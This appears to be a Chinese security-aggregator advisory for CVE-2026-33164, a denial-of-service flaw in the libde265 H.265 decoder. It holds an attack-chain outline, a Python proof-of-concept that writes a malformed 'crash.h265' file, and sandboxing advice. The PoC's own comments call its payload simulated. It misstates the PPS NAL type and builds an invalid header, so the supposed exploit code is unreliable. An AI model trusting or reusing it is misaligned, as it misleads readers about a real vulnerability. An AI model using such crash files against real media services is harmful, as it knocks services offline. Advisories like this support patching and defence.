CVE-2026-33164 CVSS 7.5 高危

CVE-2026-33164 libde265拒绝服务漏洞

披露日期: 2026-03-20

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33164

漏洞类型

拒绝服务

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

libde265

漏洞概述

libde265是一款开源H.265视频编解码器。在1.0.17版本之前，存在一个安全漏洞，攻击者可以通过精心构造的畸形的H.265 PPS NAL单元，触发`pic_parameter_set::set_derived_values()`函数中的段错误，导致程序崩溃。该漏洞具有高可用性影响，无需用户交互即可通过网络远程触发。

技术细节

该漏洞源于libde265库在解析H.265视频流中的PPS（Picture Parameter Set）NAL单元时，缺乏对输入数据的严格有效性验证。当攻击者诱导受害者处理特制的畸形H.265视频流时，库中的`pic_parameter_set::set_derived_values()`函数在执行派生值计算逻辑时，会因异常数据结构触发内存访问错误，导致段错误（Segmentation Fault）。由于解析逻辑位于视频解码的核心路径，且漏洞利用无需认证及用户交互，远程攻击者可通过网络发送恶意数据包，使集成libde265的应用程序（如媒体播放器或流媒体服务器）崩溃，从而造成严重的拒绝服务。

攻击链分析

STEP 1

1. 侦察

攻击者识别出目标系统正在使用受影响版本（<1.0.17）的libde265库进行H.265视频解码。

STEP 2

2. 武器化

攻击者构造一个包含畸形PPS NAL单元的恶意H.265视频文件或流，该数据包能够触发set_derived_values函数中的段错误。

STEP 3

3. 传递

攻击者通过网络将恶意视频流发送给目标，例如诱导用户打开特制网页视频或发送恶意文件。

STEP 4

4. 利用

目标应用程序使用libde265库解析接收到的恶意视频流，在处理畸形PPS数据时触发内存访问错误。

STEP 5

5. 影响

目标应用程序因段错误而崩溃，导致服务不可用，实现拒绝服务攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-33164 (libde265 Segmentation Fault)
# This script generates a malformed H.265 bitstream to trigger the crash.
import struct

def create_malformed_h265():
    # NAL Unit Header for PPS (Picture Parameter Set)
    # Type 0x28 is PPS in HEVC (assuming specific context)
    # Start code (0x00 0x00 0x00 0x01) + NAL header
    nal_header = bytes([0x00, 0x00, 0x00, 0x01, 0x48]) 
    
    # Malformed payload to trigger the bug in set_derived_values
    # The exact payload depends on the specific parsing logic failure,
    # but usually involves invalid sizes or flags.
    # Here we simulate a crafted payload that causes the invalid dereference.
    malformed_payload = bytes([0xFF] * 100) 
    
    return nal_header + malformed_payload

with open("crash.h265", "wb") as f:
    f.write(create_malformed_h265())

print("Malformed H.265 file generated: crash.h265")
print("Play this file with a vulnerable version of libde265 to trigger the DoS.")

影响范围

libde265 < 1.0.17

防御指南

临时缓解措施

建议在升级补丁应用前，限制对不可信视频源的处理，并在沙箱或隔离环境中运行媒体处理服务，以减少潜在的拒绝服务风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表